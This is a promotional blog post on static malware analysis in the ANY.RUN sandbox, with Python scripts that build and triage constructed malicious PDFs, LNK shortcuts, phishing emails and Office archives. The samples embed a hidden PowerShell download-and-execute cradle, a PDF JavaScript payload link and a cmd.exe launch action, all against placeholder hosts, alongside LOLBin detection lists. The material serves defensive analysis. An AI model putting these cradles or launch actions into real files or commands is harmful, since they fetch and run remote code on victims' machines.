Friday, January 31, 2025

How to Conduct Advanced Static Analysis in a Malware Sandbox


Sandboxes are synonymous with dynamic malware analysis: they execute malicious files in an isolated virtual environment and record their behavior. However, they also offer plenty of value for static analysis, where a file is inspected without being run. The five scenarios below show where a sandbox's static module can be a useful tool in your investigations.

Detecting Threats in PDFs

PDF files are frequently used by threat actors to deliver payloads. Static analysis in a sandbox makes it possible to expose the threats a malicious PDF contains by extracting its structure: objects, actions, embedded scripts and links.

The presence of JavaScript or Bash scripts, or of actions that run automatically when the document is opened, can reveal a possible mechanism for downloading and executing malware.

Sandboxes like ANY.RUN also let users scrutinize the URLs found in a PDF to identify suspicious domains, potential command and control (C2) servers, or other indicators of compromise.

Example:

Static analysis of a PDF file in ANY.RUN

Interactivity lets users manipulate files inside a VM however they want, but Static Discovery offers even more opportunities.


In this analysis session, the static module lists several URLs found inside the PDF. To analyze any of them, we can submit it for a new sandbox analysis by simply clicking the corresponding button.
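The checks described above (suspicious action keys, scripts, URLs) can be reproduced on the command line. The following is an added example written for this article, not ANY.RUN's code: it builds a small constructed PDF (the hostnames under example.invalid are placeholders, not real indicators), then scans it for the dictionary keys a static PDF triage looks at, decodes `#xx`-escaped names such as `/#4AavaScript`, and inflates FlateDecode streams so that a `/Launch` action hidden inside an object stream is not missed.

```python
import re
import zlib

# Dictionary keys that warrant a closer look in a static PDF triage.
SUSPICIOUS_KEYS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
                   b"/EmbeddedFile", b"/URI", b"/SubmitForm", b"/RichMedia")
URL_RE = re.compile(rb"https?://[^\s()<>\"']+")


def build_sample_pdf() -> bytes:
    """Constructed sample (not real malware): an OpenAction that runs JavaScript,
    a link annotation with a URI, and a FlateDecode object stream hiding a
    /Launch action. /JavaScript is spelled /#4AavaScript to defeat a naive grep."""
    hidden = b"7 0 << /S /Launch /F (cmd.exe) /P (/c calc.exe) >>"
    packed = zlib.compress(hidden)
    return (
        b"%PDF-1.7\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
        b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [5 0 R] >> endobj\n"
        b"4 0 obj << /S /#4AavaScript /JS (app.launchURL(\"http://payload.example.invalid/s.exe\")) >> endobj\n"
        b"5 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (https://phish.example.invalid/login) >> >> endobj\n"
        b"6 0 obj << /Type /ObjStm /N 1 /First 4 /Filter /FlateDecode /Length "
        + str(len(packed)).encode() + b" >>\nstream\n" + packed
        + b"\nendstream\nendobj\n"
        b"trailer << /Root 1 0 R >>\n%%EOF\n"
    )


def decode_names(data: bytes) -> bytes:
    """PDF names may escape any byte as #xx, so /#4AavaScript == /JavaScript.
    Applied to the whole buffer for simplicity; it also touches string literals."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> list:
    """Return the decompressed body of every FlateDecode stream; other filters are
    skipped. decompressobj tolerates the EOL bytes that precede 'endstream'."""
    out = []
    for m in re.finditer(rb"stream\r?\n(.*?)endstream", data, re.DOTALL):
        try:
            out.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            continue
    return out


def triage_pdf(data: bytes) -> dict:
    """Count suspicious keys and collect URLs across the raw file and inflated streams."""
    views = [data] + inflate_streams(data)
    keys, urls = {}, set()
    for view in views:
        view = decode_names(view)
        for key in SUSPICIOUS_KEYS:
            # the lookahead stops /JS from matching longer names such as /JSName
            n = len(re.findall(re.escape(key) + rb"(?![A-Za-z])", view))
            if n:
                keys[key.decode()] = keys.get(key.decode(), 0) + n
        urls.update(u.decode("latin-1") for u in URL_RE.findall(view))
    return {"keys": keys, "urls": sorted(urls), "streams_inflated": len(views) - 1}


if __name__ == "__main__":
    for name, value in triage_pdf(build_sample_pdf()).items():
        print(name, value)
```

Running it reports `/Launch` even though that key only exists inside the compressed stream, which is the point: a grep over the raw file, or a scanner that does not decode name escapes, sees neither the JavaScript nor the launch action. Streams using other filters (LZW, ASCIIHex, encryption) are skipped here and would need a full PDF parser.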

See how static and dynamic analysis in the ANY.RUN sandbox can benefit your security team.

Book a personal demo of the service today!

Exposing LNK Abuse

LNK files are Windows shortcuts that point to an executable, a document, or a folder. A sandbox can provide a clear view of an LNK file's properties, such as its target path, icon location, working directory, and any embedded commands or scripts.

Viewing the command line stored in an LNK file can reveal attempts to launch malicious software or connect to remote servers.

Static analysis in a sandbox is particularly useful for identifying threats that do not spawn a new process when detonated; these can be hard to detect through dynamic analysis alone.


Example:

The command line arguments shown in the static module reveal malicious activity

Inspecting the contents of LNK files can help you detect attacks before they begin.


In this sandbox session, we can uncover every detail about the LNK file, including its command line arguments, which show that the shortcut is configured to download and execute a payload from a malicious URL.
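To see what the static module is reading, here is an added example (written for this article, not ANY.RUN's code) that parses the Shell Link header and StringData section of an .lnk file according to Microsoft's MS-SHLLINK layout and then applies a few heuristics to what it finds. The shortcut it parses is constructed in the script; the PowerShell cradle, the example.invalid URL and the shell32.dll icon are placeholders chosen to mirror the pattern described above, not a real sample. The LinkTargetIDList and LinkInfo structures are skipped by size rather than decoded, so the absolute target stored in the IDList is not recovered here.

```python
import re
import struct

# ShellLinkHeader layout and LinkFlags follow Microsoft's MS-SHLLINK specification.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil", "bitsadmin", "msiexec")
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)


def _string_data(text: str) -> bytes:
    """StringData item: 2-byte character count, then UTF-16LE text, no terminator."""
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_sample_lnk() -> bytes:
    """Constructed sample (not a real attack artifact): a shortcut whose relative path
    reaches powershell.exe, a hidden-window download cradle in its arguments, and a
    shell32.dll icon so it does not look like a script launcher."""
    flags = HAS_REL_PATH | HAS_WORK_DIR | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, SW_SHOWMINNOACTIVE, 0, 0, 0, 0)
    return (header
            + _string_data(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe")
            + _string_data(r"C:\Windows")
            + _string_data("-w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                           ".DownloadString('http://example.invalid/p.ps1')\"")
            + _string_data(r"%SystemRoot%\System32\shell32.dll"))


def parse_lnk(data: bytes) -> dict:
    """Parse header flags and the StringData strings; skip IDList and LinkInfo by size."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:          # IDListSize (2 bytes) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:        # LinkInfoSize is the first field of LinkInfo
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"show_command": show_cmd}
    for flag, name in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                       (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                       (HAS_ICON, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        info[name] = data[pos:pos + count * width].decode("utf-16-le" if width == 2 else "cp1252")
        pos += count * width
    return info


def lnk_indicators(info: dict) -> list:
    """Heuristics, not verdicts: each hit is one more reason to detonate the shortcut."""
    target = " ".join(info.get(k, "") for k in ("relative_path", "name")).lower()
    args = info.get("arguments", "")
    hits = []
    if any(host in target for host in SCRIPT_HOSTS):
        hits.append("target is a script host / LOLBin: " + target.strip())
    if re.search(r"-w(indowstyle)?\s+hidden|-nop\b|-e(nc|ncodedcommand)?\s", args, re.I):
        hits.append("PowerShell evasion switches in arguments")
    if re.search(r"\b(iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest|"
                 r"start-bitstransfer|mshta|msiexec)\b", args, re.I):
        hits.append("download-and-execute cradle in arguments")
    for url in URL_RE.findall(args):
        hits.append("URL in arguments: " + url)
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        hits.append("window starts minimized (SW_SHOWMINNOACTIVE)")
    icon = info.get("icon_location", "").lower()
    if icon and any(h in target for h in SCRIPT_HOSTS) and not any(h in icon for h in SCRIPT_HOSTS):
        hits.append("icon borrowed from another file to disguise a script host: " + icon)
    return hits


if __name__ == "__main__":
    parsed = parse_lnk(build_sample_lnk())
    for key, value in parsed.items():
        print(f"{key:>14}: {value}")
    for hit in lnk_indicators(parsed):
        print(" !", hit)
```

None of this requires the shortcut to be clicked: the arguments, the minimized window style and the borrowed icon are all visible in the file's bytes, which is exactly what makes a static pass worthwhile before detonation.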

Investigating Spam and Phishing Emails

Email remains one of the most frequent vectors for malware distribution. A sandbox lets you upload an email file and analyze it safely, spotting spam and hidden malicious elements faster and without any risk to your infrastructure.

A sandbox shows an email preview and lists metadata and indicators of compromise (IOCs). You can examine the content of the email without opening it and inspect the metadata that reveals the email's origin, timestamps, and other relevant details.

The ANY.RUN sandbox also integrates RSPAMD, an open-source spam filtering system that assigns a phishing score to each analyzed email and displays all of its elements, using these features:

  • Header Analysis: examines email headers for sender authenticity and anomalies.
  • Reputation Checks: identifies known spam and malware sources using DNSBLs and URIBLs.
  • Bayesian Filtering: classifies emails based on probabilistic analysis.

In ANY.RUN, you can move beyond static analysis and interact with the email directly, just as you would on your own computer. This means you can download and open attachments, including password-protected ones, or follow the entire phishing attack chain starting from the initial link.

Example:

Details of an .eml file static analysis

All content inside .eml files is extracted and made accessible by static analysis in the sandbox, so users can view the details without entering the VM.

In this analysis session, we can see a .RAR attachment that accompanies the email. One of the files inside the archive is an executable named "Business Bill PDF"; an executable masquerading as a PDF is a strong indicator of malicious intent.


To analyze the executable, we can simply click the "Submit to analyze" button, which launches a new sandbox session for that file.
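The header analysis, link inspection and attachment checks described in this section can be scripted with Python's standard `email` module. The block below is an added example written for this article (not ANY.RUN's or Rspamd's code): it parses a constructed .eml (all addresses, hosts and the `Received` id are placeholders under reserved example domains), flags sender-domain mismatches and failing SPF/DKIM/DMARC results, catches a link whose visible text hides a different href, and sniffs each attachment's magic bytes so that an "Invoice.pdf" that actually starts with a PE `MZ` header is reported as an executable regardless of its declared type.

```python
import base64
import email
import re
from email import policy
from urllib.parse import urlparse

# Constructed sample .eml (not a real message): spoofed From, failing SPF/DMARC,
# a Reply-To on a different domain, a link whose visible text hides its real href,
# and an attachment declared as PDF whose bytes begin with a PE "MZ" header.
FAKE_PE = base64.b64encode(b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00").decode()
SAMPLE_EML = f"""Return-Path: <bounce@mailer.example.invalid>
Received: from mailer.example.invalid (mailer.example.invalid [203.0.113.10])
\tby mx.corp.example (Postfix) with ESMTP id 4ABC12; Fri, 31 Jan 2025 09:12:44 +0000
Authentication-Results: mx.corp.example; spf=fail smtp.mailfrom=mailer.example.invalid;
\tdkim=none; dmarc=fail header.from=bank.example
From: "Bank Support" <support@bank.example>
Reply-To: <collect@mailer.example.invalid>
To: <victim@corp.example>
Subject: Action required: invoice overdue
Date: Fri, 31 Jan 2025 09:12:40 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<html><body>Please review <a href="http://login.example.invalid/auth">https://bank.example/secure</a></body></html>
--b1
Content-Type: application/pdf; name="Invoice_2025.pdf"
Content-Disposition: attachment; filename="Invoice_2025.pdf"
Content-Transfer-Encoding: base64

{FAKE_PE}
--b1--
""".encode()

MAGIC = {b"MZ": "PE executable", b"%PDF": "PDF", b"PK\x03\x04": "ZIP/OOXML",
         b"Rar!": "RAR", b"\xd0\xcf\x11\xe0": "OLE2 (legacy Office)"}


def sniff(data: bytes) -> str:
    """Identify an attachment by its leading bytes instead of trusting its name."""
    for magic, label in MAGIC.items():
        if data.startswith(magic):
            return label
    return "unknown"


def addr_domain(value) -> str:
    m = re.search(r"@([\w.-]+)", str(value or ""))
    return m.group(1).lower() if m else ""


def triage_eml(raw: bytes) -> dict:
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    from_dom = addr_domain(msg["From"])
    for hdr in ("Reply-To", "Return-Path"):
        dom = addr_domain(msg[hdr])
        if dom and dom != from_dom:
            findings.append(f"{hdr} domain {dom} != From domain {from_dom}")
    auth = " ".join(str(h) for h in msg.get_all("Authentication-Results", []))
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", auth)
        if m and m.group(1) != "pass":
            findings.append(f"{mech}={m.group(1)}")
    links = []
    body = msg.get_body(preferencelist=("html", "plain"))
    html = body.get_content() if body else ""
    for href, text in re.findall(r'<a[^>]+href="([^"]+)"[^>]*>(.*?)</a>', html, re.I | re.S):
        links.append(href)
        shown = re.sub(r"<[^>]+>", "", text).strip()
        if shown.startswith("http") and urlparse(shown).hostname != urlparse(href).hostname:
            findings.append(f"link text {shown} hides href {href}")
    attachments = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        name, declared, actual = part.get_filename() or "(unnamed)", part.get_content_type(), sniff(data)
        attachments.append({"name": name, "declared": declared, "actual": actual, "size": len(data)})
        if actual == "PE executable" or re.search(r"\.(exe|scr|js|vbs|hta|lnk|iso|img)$", name, re.I):
            findings.append(f"executable content in attachment {name} (declared {declared}, sniffed {actual})")
    return {"findings": findings, "links": links, "attachments": attachments}


if __name__ == "__main__":
    for line in triage_eml(SAMPLE_EML)["findings"]:
        print("!", line)
```

Nothing here opens the attachment or follows the link; every finding comes from the bytes of the message, which is the static half of the workflow. A sandbox adds the dynamic half: submitting the sniffed PE, or the hidden href, for detonation.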


Analyzing Suspicious Office Documents

Microsoft Office documents, such as Word, Excel, and PowerPoint files, are among the primary security risks in both corporate and personal settings. Sandbox static analysis can be used to scrutinize various elements of such documents without opening them. These include:

  • Content: sandbox static analysis lets you examine the document's content for signs of social engineering tactics, phishing attempts, or suspicious links.
  • Macros: attackers often abuse Visual Basic for Applications (VBA) code in Office documents to automate malicious tasks, from downloading and executing malware to stealing sensitive data. ANY.RUN shows the entire execution chain of the script, enabling you to study it step by step.
  • Images and QR codes: steganography techniques let attackers conceal code inside images, and sandbox static analysis is capable of extracting this hidden data. QR codes embedded in documents may also carry malicious links; a sandbox can decode them and expose the potential threats.
  • Metadata: information about the document's creation, modification, author, and so on can help you understand the document's origin.

Example:

The sandbox can show a preview of Office files

Microsoft Office files come in various formats, and analyzing their internal structure can sometimes be challenging. Static Discovery for Office files lets you examine macros without needing additional tools.

All embedded files, including images, scripts, and executables, are also available for further analysis. QR codes are detected during static analysis, and users can submit a new task that opens the content encoded in them, such as URLs.


In this session, static analysis makes it possible to see that the analyzed .pptx file contains a .zip archive.

Looking Inside Malicious Archives

Archives such as ZIP, tar.gz, .bz2, and RAR are frequently used to bypass basic detection methods. A sandbox environment provides a safe and isolated place to analyze these files.

For instance, sandboxes can unpack archives to reveal their contents, including executable files, scripts, and other potentially malicious components. Each of these files can then be analyzed with the built-in static module to expose the threats it carries.

Example:

ZIP file structure displayed in the static analysis window

In ANY.RUN, users can submit files for a new analysis directly from within an archive in the Static Discovery window. This eliminates the need to download them or unpack them manually inside a VM.

In this analysis session, we once again see an archive whose files can be studied one by one to determine whether any further analysis is required.
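Modern Office documents (.docx, .xlsx, .pptx) are ZIP containers, so the Office section and the archive section above call for the same tool: a walker that lists an archive's members, looks inside nested archives, and flags what it finds without extracting anything to disk. The block below is an added example written for this article, not ANY.RUN's code. It constructs a pptx-shaped zip (the part names follow the OOXML layout; the external URL under example.invalid is a placeholder) that carries a `vbaProject.bin`, a relationship with `TargetMode="External"`, and an embedded .zip holding an executable named like a document, mirroring the .pptx-contains-.zip session described above. It also guards against the two classic pitfalls of automated unpacking, member names containing `..` and extreme compression ratios.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile

RISKY_EXT = (".exe", ".scr", ".dll", ".js", ".jse", ".vbs", ".vbe", ".hta", ".lnk",
             ".bat", ".cmd", ".ps1", ".jar", ".msi", ".iso", ".img")
NESTED_EXT = (".zip", ".docx", ".docm", ".xlsx", ".xlsm", ".pptx", ".pptm")
DOC_WORDS = re.compile(r"\b(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png|invoice|receipt|scan)\b")
MAX_DEPTH, MAX_RATIO, MAX_MEMBER = 4, 100, 50 * 1024 * 1024


def build_sample_pptx() -> bytes:
    """Constructed sample (not a real document): a pptx-shaped zip carrying a VBA project,
    an external OLE relationship, and an embedded zip that holds an executable."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("Business Invoice PDF.exe", b"MZ" + b"\0" * 200)
        z.writestr("readme.txt", b"open the invoice")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", b"<Types/>")
        z.writestr("ppt/presentation.xml", b"<presentation/>")
        z.writestr("ppt/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\0" * 100)
        z.writestr("ppt/slides/_rels/slide1.xml.rels",
                   b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
                   b'<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
                   b'Target="http://example.invalid/payload.html" TargetMode="External"/></Relationships>')
        z.writestr("ppt/embeddings/oleObject1.zip", inner.getvalue())
    return outer.getvalue()


def external_targets(rels_xml: bytes) -> list:
    """Targets of relationships with TargetMode="External": content fetched from outside the package."""
    try:
        root = ET.fromstring(rels_xml)
    except ET.ParseError:
        return ["<unparseable .rels>"]
    return [el.get("Target", "") for el in root.iter() if el.get("TargetMode") == "External"]


def inspect_archive(data: bytes, depth: int = 0, prefix: str = "") -> list:
    """Walk a zip and record one entry per member, descending into nested archives in memory."""
    if depth > MAX_DEPTH:
        return [{"path": prefix, "size": 0, "compressed": 0,
                 "issues": ["nested deeper than MAX_DEPTH, not descended"]}]
    entries = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            low = info.filename.lower()
            entry = {"path": prefix + info.filename, "size": info.file_size,
                     "compressed": info.compress_size, "issues": []}
            entries.append(entry)
            if ".." in info.filename.split("/") or info.filename.startswith(("/", "\\")):
                entry["issues"].append("path traversal in member name")
            if info.compress_size and info.file_size / info.compress_size > MAX_RATIO:
                entry["issues"].append("extreme compression ratio (zip bomb?)")
            if low.endswith(RISKY_EXT):
                entry["issues"].append("executable/script member")
                if DOC_WORDS.search(low.rsplit(".", 1)[0]):
                    entry["issues"].append("executable named like a document")
            if low.endswith("vbaproject.bin"):
                entry["issues"].append("VBA macro project present")
            if low.endswith(".rels"):
                for target in external_targets(z.read(info)):
                    entry["issues"].append("external relationship -> " + target)
            if low.endswith(NESTED_EXT) and info.file_size <= MAX_MEMBER:
                try:
                    entries.extend(inspect_archive(z.read(info), depth + 1, entry["path"] + "!/"))
                except zipfile.BadZipFile:
                    entry["issues"].append("archive extension but not a valid zip")
    return entries


def report(entries: list) -> list:
    """Only the members that raised an issue, as 'path: issue' lines."""
    return [f"{e['path']}: {i}" for e in entries for i in e["issues"]]


if __name__ == "__main__":
    for line in report(inspect_archive(build_sample_pptx())):
        print(line)
```

The walker handles ZIP-based formats only; RAR, tar.gz and .bz2 need their own readers (for example the `tarfile` module, or `rarfile` for RAR) but the same per-member checks apply. Keeping everything in memory and bounding depth and size is what makes it safe to run automatically on untrusted input.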

Conduct Static and Dynamic Analysis in ANY.RUN

ANY.RUN is a cloud-based sandbox with advanced static and dynamic analysis capabilities. The service lets you scan suspicious files and links and get a first verdict on their threat level in under 40 seconds. It gives you a real-time overview of the network traffic, registry activity, and processes observed during malware execution, highlighting malicious behavior and the tactics, techniques, and procedures (TTPs) involved.

ANY.RUN gives you full control over the VM, making it possible to interact with the virtual environment just as you would with an ordinary computer. The sandbox generates comprehensive reports that feature key threat information, including indicators of compromise (IOCs).

Start using ANY.RUN today for free and enjoy unlimited malware analysis in Windows and Linux VMs.
